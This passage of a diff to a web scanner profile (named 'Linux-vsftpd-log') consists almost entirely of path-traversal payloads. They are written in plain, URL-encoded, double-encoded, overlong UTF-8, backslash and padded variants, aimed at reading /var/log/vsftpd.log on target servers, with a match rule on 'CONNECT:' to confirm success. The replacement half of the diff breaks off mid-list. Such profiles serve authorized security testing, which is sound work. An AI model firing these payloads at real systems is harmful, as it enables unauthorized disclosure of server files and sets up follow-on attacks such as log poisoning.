x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,CONNECT:"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-vsftpd-log","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-vsftpd-log listed","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"var/log/vsftpd.log","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-vsftpd-log", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + 